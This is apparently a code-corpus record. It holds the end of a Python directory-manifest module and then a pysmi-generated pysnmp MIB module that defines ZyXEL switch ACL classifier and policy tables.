# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__author__ = "Michael Imelfort"
__copyright__ = "Copyright 2014"
__credits__ = ["Michael Imelfort"]
__license__ = "GPLv3"
__maintainer__ = "Michael Imelfort"
__email__ = "mike@mikeimelfort.com"
__version__ = "0.35"
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# Name of the manifest file placed inside a managed directory tree.
__MANIFEST__ = ".dmanifest"
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# system includes
import os
import hashlib
import urllib.request, urllib.error, urllib.parse
import urllib.request, urllib.parse, urllib.error
import shutil
import errno
# local includes
from fileEntity import FileEntity as FE
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# %% DEBUG
# ===================================================
# main()
# ===================================================
# for debugging purposes (code called as a script)
# the code is called from here
# ===================================================
if __name__ == '__main__':
man = ManifestManager()
man.createManifest("/home/olivi/billy/python",manifestName="Pizza3.manifest") | 44.285714 | 130 | 0.436716 |
c76b9236e24c24d26fa468bcec0fccac39b536c2 | 27,999 | py | Python | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ZYXEL-AclV2-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ZYXEL-AclV2-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:43:03 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
InetAddress, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress")
EnabledStatus, = mibBuilder.importSymbols("P-BRIDGE-MIB", "EnabledStatus")
PortList, = mibBuilder.importSymbols("Q-BRIDGE-MIB", "PortList")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter32, Integer32, Counter64, NotificationType, Bits, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, TimeTicks, iso, Gauge32, Unsigned32, IpAddress, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Integer32", "Counter64", "NotificationType", "Bits", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "TimeTicks", "iso", "Gauge32", "Unsigned32", "IpAddress", "ObjectIdentity")
RowStatus, MacAddress, DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "MacAddress", "DisplayString", "TextualConvention")
esMgmt, = mibBuilder.importSymbols("ZYXEL-ES-SMI", "esMgmt")
zyxelAclV2 = ModuleIdentity((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105))
if mibBuilder.loadTexts: zyxelAclV2.setLastUpdated('201207010000Z')
if mibBuilder.loadTexts: zyxelAclV2.setOrganization('Enterprise Solution ZyXEL')
zyxelAclV2ClassifierStatus = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1))
zyxelAclV2PolicyStatus = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2))
zyxelAclV2TrapInfoObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 3))
zyxelAclV2Notifications = MibIdentifier((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 4))
zyxelAclV2ClassifierTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierTable.setStatus('current')
zyxelAclV2ClassifierEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierEntry.setStatus('current')
zyAclV2ClassifierName = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 1), DisplayString())
if mibBuilder.loadTexts: zyAclV2ClassifierName.setStatus('current')
zyAclV2ClassifierState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 2), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierState.setStatus('current')
zyAclV2ClassifierWeight = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierWeight.setStatus('current')
zyAclV2ClassifierCountState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 4), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierCountState.setStatus('current')
zyAclV2ClassifierLogState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 5), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierLogState.setStatus('current')
zyAclV2ClassifierTimeRange = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierTimeRange.setStatus('current')
zyAclV2ClassifierMatchCount = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 1, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierMatchCount.setStatus('current')
zyxelAclV2ClassifierEthernetTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierEthernetTable.setStatus('current')
zyxelAclV2ClassifierEthernetEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierEthernetEntry.setStatus('current')
zyAclV2ClassifierEthernetSourcePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 1), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourcePorts.setStatus('current')
zyAclV2ClassifierEthernetSourceTrunks = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 2), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceTrunks.setStatus('current')
zyAclV2ClassifierEthernetPacketFormat = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("all", 1), ("ethernetIIUntagged", 2), ("ethernetIITagged", 3), ("ethernet802dot3Untagged", 4), ("ethernet802dot3Tagged", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetPacketFormat.setStatus('current')
zyAclV2ClassifierEthernet8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernet8021pPriority.setStatus('current')
zyAclV2ClassifierEthernetInner8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetInner8021pPriority.setStatus('current')
zyAclV2ClassifierEthernetType = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetType.setStatus('current')
zyAclV2ClassifierEthernetSourceMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 7), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceMacAddress.setStatus('current')
zyAclV2ClassifierEthernetSourceMACMask = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 8), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetSourceMACMask.setStatus('current')
zyAclV2ClassifierEthernetDestinationMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 9), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetDestinationMacAddress.setStatus('current')
zyAclV2ClassifierEthernetDestinationMACMask = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 2, 1, 10), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierEthernetDestinationMACMask.setStatus('current')
zyxelAclV2ClassifierVlanTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierVlanTable.setStatus('current')
zyxelAclV2ClassifierVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierVlanEntry.setStatus('current')
zyAclV2ClassifierVlanMap1k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap1k.setStatus('current')
zyAclV2ClassifierVlanMap2k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap2k.setStatus('current')
zyAclV2ClassifierVlanMap3k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap3k.setStatus('current')
zyAclV2ClassifierVlanMap4k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierVlanMap4k.setStatus('current')
zyxelAclV2ClassifierInnerVlanTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierInnerVlanTable.setStatus('current')
zyxelAclV2ClassifierInnerVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierInnerVlanEntry.setStatus('current')
zyAclV2ClassifierInnerVlanMap1k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap1k.setStatus('current')
zyAclV2ClassifierInnerVlanMap2k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap2k.setStatus('current')
zyAclV2ClassifierInnerVlanMap3k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap3k.setStatus('current')
zyAclV2ClassifierInnerVlanMap4k = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierInnerVlanMap4k.setStatus('current')
zyxelAclV2ClassifierIpTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpTable.setStatus('current')
zyxelAclV2ClassifierIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpEntry.setStatus('current')
zyAclV2ClassifierIpPacketLenRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPacketLenRangeStart.setStatus('current')
zyAclV2ClassifierIpPacketLenRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPacketLenRangeEnd.setStatus('current')
zyAclV2ClassifierIpDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDSCP.setStatus('current')
zyAclV2ClassifierIpPrecedence = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpPrecedence.setStatus('current')
zyAclV2ClassifierIpToS = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpToS.setStatus('current')
zyAclV2ClassifierIpProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpProtocol.setStatus('current')
zyAclV2ClassifierIpEstablishOnly = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 7), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpEstablishOnly.setStatus('current')
zyAclV2ClassifierIpSourceIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceIpAddress.setStatus('current')
zyAclV2ClassifierIpSourceIpMaskBits = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceIpMaskBits.setStatus('current')
zyAclV2ClassifierIpDestinationIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationIpAddress.setStatus('current')
zyAclV2ClassifierIpDestinationIpMaskBits = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationIpMaskBits.setStatus('current')
zyAclV2ClassifierIpSourceSocketRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceSocketRangeStart.setStatus('current')
zyAclV2ClassifierIpSourceSocketRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpSourceSocketRangeEnd.setStatus('current')
zyAclV2ClassifierIpDestinationSocketRangeStart = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationSocketRangeStart.setStatus('current')
zyAclV2ClassifierIpDestinationSocketRangeEnd = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIpDestinationSocketRangeEnd.setStatus('current')
zyxelAclV2ClassifierIpv6Table = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6), )
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpv6Table.setStatus('current')
zyxelAclV2ClassifierIpv6Entry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"))
if mibBuilder.loadTexts: zyxelAclV2ClassifierIpv6Entry.setStatus('current')
zyAclV2ClassifierIPv6DSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DSCP.setStatus('current')
zyAclV2ClassifierIPv6NextHeader = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6NextHeader.setStatus('current')
zyAclV2ClassifierIPv6EstablishOnly = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 3), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6EstablishOnly.setStatus('current')
zyAclV2ClassifierIPv6SourceIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 4), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6SourceIpAddress.setStatus('current')
zyAclV2ClassifierIPv6SourceIpPrefixLength = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6SourceIpPrefixLength.setStatus('current')
zyAclV2ClassifierIPv6DestinationIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 6), InetAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DestinationIpAddress.setStatus('current')
zyAclV2ClassifierIPv6DestinationIpPrefixLength = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 6, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2ClassifierIPv6DestinationIpPrefixLength.setStatus('current')
zyxelAclV2ClassifierMatchOrder = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("auto", 1), ("manual", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierMatchOrder.setStatus('current')
zyxelAclV2ClassifierLoggingState = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 8), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierLoggingState.setStatus('current')
zyxelAclV2ClassifierLoggingInterval = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyxelAclV2ClassifierLoggingInterval.setStatus('current')
zyxelAclV2PolicyTable = MibTable((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1), )
if mibBuilder.loadTexts: zyxelAclV2PolicyTable.setStatus('current')
zyxelAclV2PolicyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1), ).setIndexNames((0, "ZYXEL-AclV2-MIB", "zyAclV2PolicyName"))
if mibBuilder.loadTexts: zyxelAclV2PolicyEntry.setStatus('current')
zyAclV2PolicyName = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 1), DisplayString())
if mibBuilder.loadTexts: zyAclV2PolicyName.setStatus('current')
zyAclV2PolicyState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 2), EnabledStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyState.setStatus('current')
zyAclV2PolicyClassifier = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyClassifier.setStatus('current')
zyAclV2PolicyVid = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyVid.setStatus('current')
zyAclV2PolicyEgressPort = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyEgressPort.setStatus('current')
zyAclV2Policy8021pPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2Policy8021pPriority.setStatus('current')
zyAclV2PolicyDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyDSCP.setStatus('current')
zyAclV2PolicyTOS = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyTOS.setStatus('current')
zyAclV2PolicyBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyBandwidth.setStatus('current')
zyAclV2PolicyOutOfProfileDSCP = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutOfProfileDSCP.setStatus('current')
zyAclV2PolicyForwardingAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noChange", 1), ("discardThePacket", 2), ("doNotDropTheMatchingFramePreviouslyMarkedForDropping", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyForwardingAction.setStatus('current')
zyAclV2PolicyPriorityAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("noChange", 1), ("setThePackets802dot1Priority", 2), ("sendThePacketToPriorityQueue", 3), ("replaceThe802dot1PriorityFieldWithTheIpTosValue", 4), ("replaceThe802dot1PriorityByInner802dot1Priority", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyPriorityAction.setStatus('current')
zyAclV2PolicyDiffServAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noChange", 1), ("setThePacketsTosField", 2), ("replaceTheIpTosFieldWithThe802dot1PriorityValue", 3), ("setTheDiffservCodepointFieldInTheFrame", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyDiffServAction.setStatus('current')
zyAclV2PolicyOutgoingAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 14), Bits().clone(namedValues=NamedValues(("sendThePacketToTheMirrorPort", 0), ("sendThePacketToTheEgressPort", 1), ("sendTheMatchingFramesToTheEgressPort", 2), ("setThePacketVlanId", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutgoingAction.setStatus('current')
zyAclV2PolicyMeteringState = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyMeteringState.setStatus('current')
zyAclV2PolicyOutOfProfileAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 16), Bits().clone(namedValues=NamedValues(("dropThePacket", 0), ("changeTheDscpValue", 1), ("setOutDropPrecedence", 2), ("doNotDropTheMatchingFramePreviouslyMarkedForDropping", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyOutOfProfileAction.setStatus('current')
zyAclV2PolicyRowstatus = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 17), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyRowstatus.setStatus('current')
zyAclV2PolicyQueueAction = MibTableColumn((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 2, 1, 1, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noChange", 1), ("sendThePacketToPriorityQueue", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zyAclV2PolicyQueueAction.setStatus('current')
zyAclV2TrapClassifierLogMatchCount = MibScalar((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 3, 1), Integer32())
if mibBuilder.loadTexts: zyAclV2TrapClassifierLogMatchCount.setStatus('current')
zyAclV2ClassifierLogNotification = NotificationType((1, 3, 6, 1, 4, 1, 890, 1, 15, 3, 105, 4, 1)).setObjects(("ZYXEL-AclV2-MIB", "zyAclV2ClassifierName"), ("ZYXEL-AclV2-MIB", "zyAclV2TrapClassifierLogMatchCount"))
if mibBuilder.loadTexts: zyAclV2ClassifierLogNotification.setStatus('current')
